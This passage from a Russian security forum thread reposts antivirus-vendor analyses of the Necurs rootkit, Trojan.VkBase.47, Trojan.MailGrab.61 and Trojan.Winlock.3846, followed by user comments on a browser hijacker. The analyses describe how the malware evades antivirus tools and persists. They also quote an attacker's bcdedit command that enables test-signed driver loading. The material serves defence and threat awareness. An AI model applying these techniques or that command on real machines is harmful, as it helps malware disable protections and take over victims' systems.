Сказанное ниже относится к обоим руткитам — их функционал полностью идентичен, различаются только лишь платформы. Если драйвер успешно загрузился и работает в системе, то избавление от него стоит многого. Руткит блокирует запуск драйверов, относящихся к антируткитам и продуктам AV-вендоров. Для этого используются списки с названиями файлов конкретных драйверов и строки, по которым будет производиться поиск в секции Security массива DataDirectory загружаемого образа. Если руткит обнаруживает загрузку «недоверенного» драйвера, то в образе последнего изменяются байты на точке входа, что исключает его корректный запуск.
Изображение

Фрагмент руткита, содержащий строки, по которым производится
блокировка загрузки антивирусных драйверов

«Головное» приложение руткит защищает при помощи перехвата ZwOpenProcess / ZwOpenThread в SDT (только на 32-битных версиях Windows) и установки object manager callback`ов на доступ к «доверенным» приложениям. Также, мониторится файловая система, с помощью подключения к стэкам файловых систем, и реестр — при помощи установки registry callback`ов.

Данный руткит — очередной живой пример (после TDSS) того, что для реализации руткит-функционала на 64-битных платформах нет необходимости в обходе Patch Guard-а.

Сам даунлоадер написан на языке C++, ничем не защищён. Основная его задача — установить и запустить соответствующий драйвер (32- или 64- битный), скачать и запустить файл по одному из URL`ов. Самое интересное, что по одной из ссылок располагается Hoax.OSX.Defma.f, про который мы совсем недавно писали. И что самое главное — зловред пытается его запустить … под Windows (!). По-видимому, разработчики новейшего ложного антивируса под MacOS активно его распространяют через посредников. А последние, в свою очередь, не сильно разбираются, что им предлагается установить на компьютерах пользователей.
Изображение

Фрагмент кода зловреда, выполняющий загрузку и запуск файла

«Лаборатория Касперского» успешно детектирует и обезвреживает загрузчик Trojan-Downloader.Win32.Necurs.a и соответствующий руткит Rootkit.Win32.Necurs.a / Rootkit.Win64.Necurs.a.

Источник

Радуйтесь людям. Радуйтесь всему. Это Россия!


#33 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 16 Май 2011 - 01:50

Новый 64-битный руткит и FakeAV под MacOS вместе?

На днях в антивирусную лабораторию попал очень интересный сампл — даунлоадер, содержащий в себе два драйвера, и скачивающий фальшивый антивирус, как под платформу PC, так и под MacOS. Этот зловред загружается и устанавливается на машину пользователя при помощи эксплойт-пака “BlackHole Exploit Kit”. Последний, в свою очередь, содержит эксплойты, использующие уязвимости в JRE (CVE-2010-0886, CVE-2010-4452, CVE-2010-3552) и PDF.

Оба драйвера — типичные руткиты с богатым функционалом. Один из них — 32-битный, а второй — 64-битный. Особенность последнего состоит в том, что он подписан т.н. тестовой цифровой подписью. Если Windows, семейства Vista и выше, была загружена с ключом ‘TESTSIGNING’, то приложения смогут загружать драйвера, подписанные тестовой подписью. Это специальная лазейка, которую оставила Microsoft для разработчиков драйверов, чтобы те могли тестировать свои творения. Этим-то и воспользовались злоумышленники — они выполняют команду ‘bcdedit.exe –set TESTSIGNING ON’, что позволяет им запустить свой драйвер без легальной подписи.

Сказанное ниже относится к обоим руткитам — их функционал полностью идентичен, различаются только лишь платформы. Если драйвер успешно загрузился и работает в системе, то избавление от него стоит многого. Руткит блокирует запуск драйверов, относящихся к антируткитам и продуктам AV-вендоров. Для этого используются списки с названиями файлов конкретных драйверов и строки, по которым будет производиться поиск в секции Security массива DataDirectory загружаемого образа. Если руткит обнаруживает загрузку «недоверенного» драйвера, то в образе последнего изменяются байты на точке входа, что исключает его корректный запуск.
Изображение
Фрагмент руткита, содержащий строки, по которым производится
блокировка загрузки антивирусных драйверов


«Головное» приложение руткит защищает при помощи перехвата ZwOpenProcess / ZwOpenThread в SDT (только на 32-битных версиях Windows) и установки object manager callback`ов на доступ к «доверенным» приложениям. Также, мониторится файловая система, с помощью подключения к стэкам файловых систем, и реестр — при помощи установки registry callback`ов.

Данный руткит — очередной живой пример (после TDSS) того, что для реализации руткит-функционала на 64-битных платформах нет необходимости в обходе Patch Guard-а.

Сам даунлоадер написан на языке C++, ничем не защищён. Основная его задача — установить и запустить соответствующий драйвер (32- или 64- битный), скачать и запустить файл по одному из URL`ов. Самое интересное, что по одной из ссылок располагается Hoax.OSX.Defma.f, про который мы совсем недавно писали. И что самое главное — зловред пытается его запустить … под Windows (!). По-видимому, разработчики новейшего ложного антивируса под MacOS активно его распространяют через посредников. А последние, в свою очередь, не сильно разбираются, что им предлагается установить на компьютерах пользователей.
Изображение
Фрагмент кода зловреда, выполняющий загрузку и запуск файла

«Лаборатория Касперского» успешно детектирует и обезвреживает загрузчик Trojan-Downloader.Win32.Necurs.a и соответствующий руткит Rootkit.Win32.Necurs.a / Rootkit.Win64.Necurs.a.

Источник

Радуйтесь людям. Радуйтесь всему. Это Россия!


#34 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 30 Июнь 2011 - 02:04

Вредоносный зоопарк для жертв Trojan.VkBase.47

Поисковые сервисы стремительно эволюционируют на благо пользователей, совершенствуя методики обработки запросов, неуклонно повышая быстродействие и релевантность отчетов. Однако не брезгуют современными технологиями и вирусописатели. Новая модификация троянской программы Trojan.VkBase.47, которую обнаружили специалисты компании «Доктор Веб», способна использовать для загрузки многочисленных вредоносных объектов на компьютер жертвы список, полученный из распределенной сети серверов.

На сегодняшний день это сорок седьмая по счету модификация семейства Trojan.VkBase., которое вот уже более семи месяцев не дает покоя пользователям. Данный троянец разработан злоумышленниками для скрытой загрузки на компьютер жертвы различных вредоносных программ: их список он получает с помощью поискового запроса, направляемого распределенной сети серверов.
Изображение

Инфицируя компьютер, Trojan.VkBase.47 копирует себя в папку установки Windows, а затем создает в реестре раздел HKLM\SOFTWARE\services32.exe. Там он формирует ряд записей, предназначенных для контроля результативности заражения системы. Одновременно с этим троянец создает специальный файл журнала, куда заносятся сведения обо всех запущенных в настоящий момент процессах. Если среди них обнаруживаются идентификаторы стандартных модулей антивирусных программ, Trojan.VkBase.47 завершает работу. В противном случае троянец индексирует в реестре записи, относящиеся к системе безопасности Windows, останавливает Windows Firewall и изменяет конфигурацию безопасности Attachment Manager — в результате этого отключаются стандартные предупреждения при попытке запуска в системе загруженных из Интернета исполняемых файлов.

Вслед за этим Trojan.VkBase.47 сохраняет на диске файл сценария командного интерпретатора cmd.exe и запускает его на исполнение. Данный сценарий в свою очередь копирует исполняемый файл троянца в подпапку \Update.1 системной директории под именем svchost.exe, добавляет этот файл в отвечающую за автозагрузку ветвь системного реестра, отключает User Account Control и добавляет себя в исключения Windows Firewall. Будучи запущенной одновременно с операционной системой, вредоносная программа реализует свою основную задачу: соединившись с несколькими удаленными узлами, Trojan.VkBase.47 получает от них список IP-адресов, по которым троянец посылает поисковые запросы для нахождения новых вредоносных приложений, а затем скачивает и устанавливает их на зараженный компьютер.

Основная опасность Trojan.VkBase.47 кроется в том, что данный троянец благодаря встроенной функции поиска может инсталлировать на инфицированном компьютере широчайший список вредоносных программ. Специалисты компании «Доктор Веб» рекомендуют пользователям проявлять бдительность и не забывать о сканировании дисков компьютера с использованием Dr.Web.

Служба информации
компании «Доктор Веб»


Радуйтесь людям. Радуйтесь всему. Это Россия!


#35 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 04 Июль 2011 - 02:37

Trojan.MailGrab.61: «накрутка» сайтов и сбор адресов e-mail с помощью зараженных компьютеров

Проникнув в операционную систему, Trojan.MailGrab.61 создает во временной папке свою копию со случайным именем и расширением .dll, после чего согласно встроенному в него списку возможных путей установки наиболее популярных программ пытается создавать в них собственные копии с именем характерной для каждого приложения динамической библиотеки. Затем троянец копирует себя в директорию установки используемого по умолчанию браузера под видом одной из них, на случай если в его списке отсутствует браузер пользователя. В перечне приложений, которые способен инфицировать Trojan.MailGrab.61, присутствует множество ftp-клиентов и такие программы как Outlook Express, The Bat!, Windows Mail, Windows Media Player, WinRAR, PHP Expert Editor, Notepad ++, Windows Photo Viewer, DVD Maker, Total Commander, FAR, а также некоторые другие. Поскольку системный загрузчик по умолчанию ищет необходимые библиотеки сначала в текущей папке, то в момент старта инфицированной программы Trojan.MailGrab.61 загружается в адресное пространство ее процесса под видом стандартной динамической библиотеки и отмечает свой изначальный установщик на удаление после перезагрузки системы.
Изображение

Будучи загруженной в память, данная вредоносная программа определяет версию операционной системы и пытается установить, является ли процесс, в который она внедрилась, браузером. Если это действительно так, Trojan.MailGrab.61 отправляет на принадлежащий злоумышленникам сервер сообщение об успешной установке, а в ответ получает зашифрованный список URL сайтов, посещаемость которых следует повысить. Вслед за этим троянец начинает отправлять на эти сайты циклические http-запросы. Троянская программа перехватывает все отправляемые в сеть данные и сканирует их на наличие адресов электронной почты, которые в случае обнаружения сохраняются в файле Windows\inf\jer.pnf. Содержимое этого файла также передается злоумышленникам, а после успешной отсылки данной информации — удаляется. Таким образом троянец пополняет спамерские базы данных.

Для удаления этой вредоносной программы достаточно проверить операционную систему сканером Dr.Web, который входит в состав любого антивирусного продукта компании «Доктор Веб» для ОС Microsoft Windows.

Радуйтесь людям. Радуйтесь всему. Это Россия!


#36 a-vas

a-vas

    Мастер

  • Пользователи+
  • PipPipPipPipPipPipPip
  • 273 сообщений
  • Пол:Мужчина

Отправлено 05 Июль 2011 - 06:30

Нежелательные программы

Перехватчики страниц (highjackers) - от английского highjack - "захватывать", вид нежелательной компьютерной программы, целью написания которой является принудительная установка нужной ее заказчику страницы в качестве стартовой на компьютере, в который смог проникнуть такой троянец.

Похоже у меня как раз со вчерашнего дня такой «хайджекер». В Opera-11 не устанавливается домашняя страничка, а настырно меняется на ctel.ru. Переустановка и загрузка новой версии не помогли. Тогда я вместо Opera воспользовался сегодня для входа в Интернет браузером FireFox 5.0. Через некоторое время самопроизвольно дважды открывались странички рекламного содержания. Еще хорошо, что не порнография.

#37 a-vas

a-vas

    Мастер

  • Пользователи+
  • PipPipPipPipPipPipPip
  • 273 сообщений
  • Пол:Мужчина

Отправлено 08 Июль 2011 - 03:56

Кстати, решил эту проблему. Для Оперы – найти файл WINDOWS\SYSTEM32\ operaprefs_fixed.ini, убедиться, что назойливая страничка прописана именно там, и удалить этот файл. Для других браузеров – удалить в системном реестре Windows ссылки на эту страничку.

#38 adolf5453125

adolf5453125

    Мастер

  • Пользователи+
  • PipPipPipPipPipPipPip
  • 373 сообщений

Отправлено 16 Июль 2011 - 05:57

Я как раз оперой и пользуюсь, привык к этому браузеру! Спасибо за информацию, возможно, пригодиться!

#39 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 20 Июль 2011 - 07:44

Trojan.Winlock.3846 угрожает зарубежным пользователям

Волны заражений ПК российских пользователей вредоносными программами семейства Trojan.Winlock, первая из которых пришлась на конец 2009 – начало 2010 года, а вторая — на лето 2010 года, уже давно миновали, однако в настоящее время наблюдается тенденция к распространению угроз подобного типа за пределами России. Компания «Доктор Веб» — ведущий российский разработчик средств информационной безопасности — предупреждает о новой модификации этой троянской программы, получившей название Trojan.Winlock.3846 и рассчитанной в первую очередь на зарубежную аудиторию. Говорить об эпидемии пока преждевременно, однако это уже вторая подобная угроза, выявленная специалистами «Доктор Веб» в текущем месяце.

В России от троянцев семейства Trojan.Winlock пострадали миллионы пользователей. На сегодняшний день волна заражений пошла на убыль: в частности, этому помог проект www.drweb.com/unlocker, а также сотрудничество «Доктор Веб» с ведущими российскими мобильными операторами. Тем не менее, сейчас проблема троянцев-блокировщиков стала актуальна и для зарубежных пользователей.

В отличие от троянца Trojan.Winlock.3794, о котором мы уже писали ранее, новая модификация программы-вымогателя записывает ссылку на себя в разделе системного реестра
#HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\userinit, который отвечает за запуск программ системным процессом winlogon в момент входа пользователя Windows в систему. Благодаря этому операционная система оказывается заблокированной при первой же после заражения перезагрузке компьютера.
Изображение

Вместо привычного интерфейса Windows на экране инфицированного компьютера появляется сообщение о сбое некоего системного процесса по адресу 0x3BC3. Для его устранения пользователю предлагается позвонить по одному из указанных телефонных номеров и ввести код разблокировки в соответствующее поле. Звонок на эти номера, естественно, является платным.

Данная модификация «винлокера» имеет одну характерную особенность: в ресурсах троянца содержится несколько языковых версий блокирующего компьютер окна для различных локализаций Windows. Как минимум имеются варианты сообщения на английском, французском и русском языках.

Для разблокировки операционной системы, пострадавшей от действий троянца Trojan.Winlock.3846 воспользуйтесь следующим кодом разблокировки:

754-896-324-589-742

Как и прежде, компания «Доктор Веб» настоятельно рекомендует пользователям воздерживаться от запуска приложений, загруженных из неблагонадежных источников, и вложений в сообщения электронной почты, полученных от неизвестных отправителей. Следует с осторожностью относиться к возникающим в процессе просмотра веб-страниц сообщениям браузеров с предложением установки каких-либо модулей или плагинов. Если вы стали жертвой троянца Trojan.Winlock.3846, воспользуйтесь средством аварийного восстановления системы Dr.Web LiveCD и лечащей утbлитой Dr.Web CureIt!.

drweb.com


Радуйтесь людям. Радуйтесь всему. Это Россия!


#40 IvanDrago

IvanDrago

    Мастер

  • Пользователи+
  • PipPipPipPipPipPipPip
  • 254 сообщений

Отправлено 21 Июль 2011 - 10:15

А восстановление системы помогает, если в системе вирус? Просто я слышал, что вирус лучше вылечить или удалить.




Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 анонимных